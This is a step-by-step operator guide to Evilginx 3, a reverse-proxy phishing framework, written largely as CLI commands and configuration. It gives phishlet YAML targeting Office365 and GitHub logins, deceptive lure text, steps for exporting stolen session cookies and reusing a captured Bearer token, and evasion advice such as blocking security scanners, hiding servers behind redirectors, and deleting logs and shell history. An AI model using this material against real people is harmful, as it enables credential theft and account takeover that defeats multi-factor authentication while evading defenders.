Evilginx 3

Evilginx 3 is a standalone man-in-the-middle phishing framework that uses reverse proxy technology to intercept and modify HTTP/HTTPS traffic in real time. It captures both credentials and session tokens, effectively bypassing multi-factor authentication by stealing the authenticated session cookies issued after the victim completes the login flow.

Install Evilginx 3 from the official GitHub repository. The v3 release is still developed in the evilginx2 repository, which carries the latest version.

# Clone the repository
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2

# Build from source using make
make

# Binary will be in ./bin/evilginx
./bin/evilginx -v

Requirements:

  • Go 1.18+ (for building from source)
  • Linux/macOS (Windows support via WSL2)
  • Root/sudo access for binding to port 443 and 80
  • Valid domain and DNS control
  • SSL/TLS certificate (auto-provisioned via Let’s Encrypt)

# Install dependencies on Ubuntu/Debian
sudo apt-get install build-essential git golang-go

# Build and install to /usr/local/bin
cd evilginx2 && make && sudo cp bin/evilginx /usr/local/bin/

Launch Evilginx with minimal configuration and interactive command-line interface.

# Run with default config
sudo evilginx

# Run with custom config directory
sudo evilginx -c /path/to/config

# Run in debug mode (verbose output)
sudo evilginx -d

Upon startup, Evilginx listens on 0.0.0.0:443 (HTTPS) and 0.0.0.0:80 (HTTP redirect). Enter the interactive CLI to configure phishlets and manage sessions.

[*] Listening on 0.0.0.0:443 (HTTPS)
[*] Listening on 0.0.0.0:80 (HTTP)
[*] Type 'help' for available commands
evilginx >

Core settings for domain, IP address, and redirect handling.

evilginx > config domain <domain.com>

Set the primary phishing domain used for all phishlets. This domain must have DNS and wildcard DNS records pointing to your Evilginx server.

evilginx > config domain attacker.com
evilginx > config domain
[+] Current domain: attacker.com

evilginx > config ipv4 <public_ip>

Specify the external IP address for DNS A records and callback URLs. Critical for phishlets to function correctly when behind NAT/proxies.

evilginx > config ipv4 192.0.2.100

evilginx > config redirect_url <url>

Set the fallback redirect destination after credential capture. Victims who don’t match a phishlet or lure are redirected here to avoid suspicion.

evilginx > config redirect_url https://www.google.com

evilginx > config cert <path_to_cert> <path_to_key>

Provide custom SSL certificates. By default, Evilginx auto-generates self-signed certs and provisions Let’s Encrypt certificates for valid domains.

evilginx > config phishlets
[+] Loaded phishlets: 25

Phishlets are YAML blueprints that define how Evilginx proxies a target website. Each phishlet maps legitimate host domains to phishing domains and defines credential capture rules.

name: "Office365"
author: "attacker"
min_ver: "3.1.0"

proxy_hosts:
  - phish_sub: "office"
    orig_sub: ""
    domain: "microsoft.com"
    session: true
    is_api: false
  
  - phish_sub: "login"
    orig_sub: "login"
    domain: "microsoft.com"
    session: true
    is_api: false

sub_filters:
  - triggers_on: "microsoft.com"
    filter_type: "text"
    old_value: "window.location"
    new_value: "window.location_hijacked"

auth_tokens:
  - token_name: "access_token"
    search: "access_token=([^&]+)"
    type: "url_query"

credentials:
  - field: "login"
    search: "username=([^&]+)"
    type: "post"

  - field: "password"
    search: "password=([^&]+)"
    type: "post"

auth_urls:
  - "/login"
  - "/oauth/authorize"

force_post_intercept:
  - path: "/login"
    key: "username"
evilginx > phishlets load
[+] Loaded 25 phishlets from phishlets directory

Phishlets are automatically loaded from the phishlets/ directory on startup. Create custom phishlets or use pre-built ones from the repository.

evilginx > phishlets hostname <phishlet> <hostname>

Set the phishing hostname for a phishlet. This is the domain your victim will visit.

evilginx > phishlets hostname office365 office.attacker.com
evilginx > phishlets enable office365
evilginx > phishlets disable office365
evilginx > phishlets
[+] Enabled:  office365, gmail, okta
[+] Disabled: github, aws

Enable phishlets you want to deploy. Disabled phishlets will not intercept traffic.

Create custom phishlets by defining proxy hosts, content filters, and credential capture rules in YAML.

Proxy Hosts (phish_sub, orig_sub, domain):

Map legitimate website subdomains to phishing subdomains. The framework rewrites traffic between them.

proxy_hosts:
  - phish_sub: "accounts"           # subdomain on attacker domain
    orig_sub: "accounts"            # original subdomain on target
    domain: "github.com"            # target domain
    session: true                   # capture session cookies
    is_api: false                   # standard HTTP/HTTPS

Sub Filters (content rewriting):

Modify HTML/JavaScript responses in real-time to redirect victims to your phishing domain.

sub_filters:
  - triggers_on: "github.com"
    filter_type: "text"
    old_value: "github.com"
    new_value: "attacker.com"
    
  - triggers_on: "cdn.github.com"
    filter_type: "regex"
    old_value: "https?://[a-z]+\\.github\\.com"
    new_value: "https://phish.attacker.com"

Auth Tokens (session cookie capture):

Extract and log authenticated session tokens from responses or cookies.

auth_tokens:
  - token_name: "github_session"
    search: "__session=([^;]+)"
    type: "cookie"
  
  - token_name: "api_token"
    search: "token=([^&]+)"
    type: "url_query"
    
  - token_name: "bearer"
    search: "Authorization: Bearer ([^ ]+)"
    type: "header"

Credentials (username/password capture):

Extract credentials from POST requests during login.

credentials:
  - field: "username"
    search: "login=([^&]+)"
    type: "post"
    
  - field: "password"
    search: "password=([^&]+)"
    type: "post"

Auth URLs (trigger points):

Define URL paths where authentication happens to focus credential capture.

auth_urls:
  - "/login"
  - "/session/authenticate"
  - "/oauth/authorize"

Force POST Intercept:

Intercept and log POST requests at specific paths even if credentials aren’t found.

force_post_intercept:
  - path: "/login"
    key: "username"

Lures are shortened URLs with custom parameters that track victims and control their experience. They’re the actual phishing links you send to targets.

evilginx > lures create <phishlet>

Generate a new lure for a specific phishlet.

evilginx > lures create office365
[+] Lure created: https://attacker.com/F3Dx92k1

evilginx > lures edit <lure_id> <key> <value>

Add custom parameters to lures for tracking or campaign identification.

evilginx > lures edit F3Dx92k1 param campaign_name marketing_team_1
evilginx > lures edit F3Dx92k1 param tracking_id 12345
evilginx > lures get-url <lure_id>
https://attacker.com/F3Dx92k1?campaign_name=marketing_team_1&tracking_id=12345
evilginx > lures edit <lure_id> og-title "Verify Your Account"
evilginx > lures edit <lure_id> og-description "Click here to verify your Microsoft 365 account"
evilginx > lures edit <lure_id> og-image "https://attacker.com/microsoft-preview.png"

Open Graph tags control how the lure appears when shared on social media or messaging apps.

Monitor and export captured credentials and session tokens.

evilginx > sessions
[+] Sessions:
    ID  | Username      | Password       | Tokens
    1   | user@acme.com | P@ssw0rd!      | access_token=xyz123...
    2   | john.doe      | MySecureP@ss   | session_id=abc456...

evilginx > sessions <session_id>
[+] Session ID: 1
    Username: user@acme.com
    Password: P@ssw0rd!
    Phishlet: office365
    IP: 203.0.113.42
    User-Agent: Mozilla/5.0 Windows 10
    Cookies: __session=xyz123;secure_token=abc456
    Headers: Authorization: Bearer token_xyz...

evilginx > sessions export <format>

Export captured credentials and cookies in formats compatible with browser extensions or tools.

# Export as JSON
evilginx > sessions export json > captured_sessions.json

# Export cookies for browser import
evilginx > sessions export cookies > cookies.txt

Import exported cookies into your browser:

# cookies.txt uses the Netscape cookie-file format; import it with a browser extension or similar tool (placeholder command)
cat cookies.txt | import-to-browser

Block automated scanners, researchers, and unwanted traffic.

evilginx > blacklist mode
[+] Current mode: redirect

Set blacklist behavior: redirect (send to fallback URL), jail (serve fake page), or none.

evilginx > blacklist add <ip>
evilginx > blacklist add 192.168.1.100

Block specific IPs from accessing your phishlet.

evilginx > blacklist add-ua "curl/7.68"
evilginx > blacklist add-ua "python-requests"

Block common security scanner user agents.

evilginx > blacklist
[+] Blacklisted IPs: 192.168.1.100, 203.0.113.55
[+] Blacklisted User-Agents: curl, python-requests, nmap

Configure DNS records for your phishing domain to route traffic to Evilginx.

Point your phishing domain to the Evilginx server IP:

attacker.com    A    192.0.2.100

Create a wildcard record to match all subdomains used by phishlets:

*.attacker.com  A    192.0.2.100

This allows phishlets like office.attacker.com, login.attacker.com, etc., to resolve correctly.

Verification:

nslookup office.attacker.com
# Should resolve to 192.0.2.100

nslookup login.attacker.com
# Should also resolve to 192.0.2.100

Evilginx automatically manages SSL certificates for seamless HTTPS proxying.

evilginx > config cert auto

Enable automatic certificate provisioning via Let’s Encrypt. Requires valid domain ownership and DNS records.

# Certificates are stored in ./certs/
ls -la certs/
total 32
-rw-r--r-- 1 root root 1234 attacker.com.crt
-rw-r--r-- 1 root root 567  attacker.com.key

evilginx > config cert /path/to/cert.crt /path/to/cert.key

Use pre-generated certificates (self-signed or commercial).

# Generate self-signed certificate for testing
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Let’s Encrypt certificates auto-renew 30 days before expiration. Monitor renewal status:

evilginx > config cert status
[+] Certificate for attacker.com expires in 87 days
[+] Auto-renewal enabled

Complete attack flow from phishlet setup to browser session hijacking.

evilginx > phishlets load
evilginx > phishlets enable office365
evilginx > phishlets hostname office365 office.attacker.com
evilginx > config domain attacker.com
evilginx > config ipv4 192.0.2.100
evilginx > config redirect_url https://www.google.com

Ensure DNS resolves phishing domain:

office.attacker.com  A  192.0.2.100
*.attacker.com       A  192.0.2.100

evilginx > lures create office365
evilginx > lures get-url <lure_id>
https://office.attacker.com/<random_id>

Deliver the lure URL via social engineering, email, SMS, etc.

evilginx > sessions
[+] New session captured!
    Username: victim@company.com
    Password: [redacted]
    Tokens: access_token=eyJhbGc...
evilginx > sessions export cookies > cookies.txt

# Import into browser to hijack authenticated session
# Or use tokens with API requests
curl -H "Authorization: Bearer eyJhbGc..." https://api.microsoft.com/me

Operational security considerations for long-term phishing campaigns.

Use domains registered weeks or months prior to the campaign. Fresh domains are flagged by security tools and email filters.

# Check domain registration date
whois attacker.com | grep "Creation Date"

Submit your phishing domain to legitimate categorization services before the campaign to build reputation.

# Check domain reputation
curl https://api.abuseipdb.com/api/v2/check?ipAddress=192.0.2.100

Use a second-stage redirector to hide Evilginx infrastructure:

Target (microsoft.com)

Redirector (CloudFlare, cheap VPS)

Evilginx Server (well-hardened, behind firewall)

Firewall rules to allow only redirector traffic:

sudo ufw allow from 198.51.100.0/24 to any port 443
sudo ufw allow from 198.51.100.0/24 to any port 80
sudo ufw default deny incoming

Disable or minimize logging to reduce forensic artifacts:

# Clear Evilginx logs regularly
sudo rm -f ~/.evilginx/logs/*

# Disable bash history for sensitive commands
HISTFILE=/dev/null evilginx

Browser shows SSL/TLS warnings or “invalid certificate” errors.

Cause: Self-signed certificates or Let’s Encrypt provisioning failure.

Fix:

# Verify Let's Encrypt is working
evilginx > config cert status

# Manually provision certificate
evilginx > config cert /path/to/valid.crt /path/to/valid.key

# Check firewall isn't blocking port 80 (required for ACME validation)
sudo ufw status

Credentials not logged in sessions despite victim login attempt.

Cause: Incorrect auth_tokens or credentials regex patterns.

Fix:

# Enable debug logging to inspect HTTP traffic
sudo evilginx -d

# Review phishlet definition for typos in regex patterns
cat phishlets/office365.yaml

# Test regex patterns manually
echo "username=victim&password=P@ss" | grep -oP 'password=\K[^&]+'

Phishing domain doesn’t resolve or resolves to wrong IP.

Fix:

# Verify DNS propagation
nslookup office.attacker.com

# Force refresh DNS cache
sudo systemctl restart systemd-resolved

# Check /etc/hosts doesn't override DNS
cat /etc/hosts | grep attacker

Process terminates unexpectedly or consumes excessive RAM.

Cause: Large session database or concurrent connection limits.

Fix:

# Monitor resource usage
top -p $(pidof evilginx)

# Increase file descriptor limit
ulimit -n 65536

# Clear old sessions periodically
evilginx > sessions delete <old_session_id>

  • Test phishlets locally first — validate credential capture and token extraction before deployment
  • Use aged domains — domains registered months prior are less likely flagged
  • Monitor session quality — verify captured tokens actually work before relying on them
  • Rotate phishing infrastructure — change IPs and domains frequently to evade detection
  • Implement fallback redirects — redirect suspicious traffic to legitimate sites to avoid alerting victims
  • Use HTTPS consistently — all communication must be encrypted to avoid middle-mile detection
  • Clean up regularly — delete old sessions and logs to minimize forensic evidence
  • Rate-limit requests — prevent scanning tools from enumerating phishlets
  • Deploy behind redirector — never expose Evilginx server directly to targets
  • Test token longevity — verify exported session tokens remain valid and aren’t invalidated immediately

GoPhish — Standalone phishing server with email campaign management; easier to use but less powerful than Evilginx for MFA bypass.

Modlishka — Reverse proxy phishing framework similar to Evilginx; supports proxying arbitrary websites without pre-built phishlets.

Muraena — JavaScript-based reverse proxy with advanced credential and session token capture; excellent for complex web applications.

EvilnoVNC — Browser-in-browser phishing attack vector; tricks victims by displaying fake browser windows to capture credentials.

CredSniper — AWS-based credential harvester with built-in email delivery and analytics; cloud-hosted alternative to Evilginx.